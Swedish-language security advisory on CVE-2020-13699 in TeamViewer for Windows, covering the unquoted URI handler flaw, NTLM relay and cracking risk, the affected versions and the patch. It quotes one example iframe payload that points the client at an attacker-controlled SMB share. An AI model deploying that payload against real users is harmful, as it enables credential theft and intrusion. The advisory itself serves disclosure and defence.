En högrisksårbarhet har hittats i TeamViewer för Windows. Den spåras som ”CVE-2020-13699”, med en CVSS-poäng på ”8.8” som kan utnyttjas av fjärrangripare för att knäcka användarnas lösenord och därefter leda till ytterligare systemutnyttjande.

TeamViewer är en programvara för fjärrstyrning, skrivbordsdelning, onlinemöten, webbkonferenser och filöverföring mellan datorer, utvecklad av det tyska företaget TeamViewer GmbH. TeamViewer finns för operativsystemen Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 och BlackBerry. Det är också möjligt att komma åt ett system som kör TeamViewer med en webbläsare.

En nyligen ökad användning av program för fjärranslutningsprogram på grund av den senaste COVID-19-pandemiska kulturförändringen för arbete hemifrån.

(CVE-2020-13699) Sårbarhetsdetaljer:

• CVE-2020-13699 är en säkerhetsbrist som härstammar från en icke-kvoterad sökväg eller ett icke-kvoterat element. Sårbarheten beror särskilt på att programmet inte citerar sina anpassade URI-hanterare korrekt.

• En användare med en installerad sårbar TeamViewer-version luras att besöka en illasinnat utformad webbplats för att utnyttja sårbarheten.

• Enligt Jeffrey Hofmann, säkerhetsingenjör på Praetorian, som upptäckte och avslöjade sårbarheten: ”En angripare kan bädda in en illasinnad iframe på en webbplats med en manipulerad URL (iframe src=’teamviewer10: -play \\attacker-IP\share\fake.tvs’) som skulle starta TeamViewer Windows desktop-klienten och tvinga den att öppna en fjärr-SMB-delning.”
• Windows kommer att utföra NTLM-autentisering när SMB-delningen öppnas. Denna begäran kan vidarebefordras, vilket innebär att en angripare kan fånga en autentisering och skicka den till en annan server, vilket ger dem möjlighet att utföra operationer på fjärrservern med hjälp av den autentiserade användarens privilegier.
• Ett framgångsrikt utnyttjande av den här sårbarheten kan göra det möjligt för en fjärrangripare att starta TeamViewer med godtyckliga parametrar. Programmet kan tvingas vidarebefordra en NTLM-autentiseringsbegäran till angriparens system, vilket möjliggör offline-attacker mot regnbågstabellen och försök att knäcka med brutal kraft.

• Dessa attacker kan leda till ytterligare utnyttjande på grund av stulna autentiseringsuppgifter från det framgångsrika utnyttjandet av sårbarheten.

I avslöjandet föreslogs att det inte finns några bevis för att denna sårbarhet utnyttjas.

Enligt CIS är risken för utnyttjande hög för statliga institutioner och medelstora företag. När det gäller småföretag är risken medelhög och låg för hemanvändare.

Inverkan
Utnyttjandet av sårbarheterna kan göra det möjligt för fjärrangripare att erhålla känslig information om autentiseringsuppgifter eller ta full kontroll över det drabbade systemet.

Berörda produkter
TeamViewer Windows Desktop Application före 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 och 15.8.3.

Lösning
TeamViewer har publicerat en säkerhetsuppdatering som tar itu med CVE-2020-13699.

SanerNow-säkerhetsinnehåll för att upptäcka och minska sårbarheten publiceras. Vi rekommenderar starkt att du tillämpar säkerhetsuppdateringen med hjälp av vår publicerade instruktion i supportartikeln.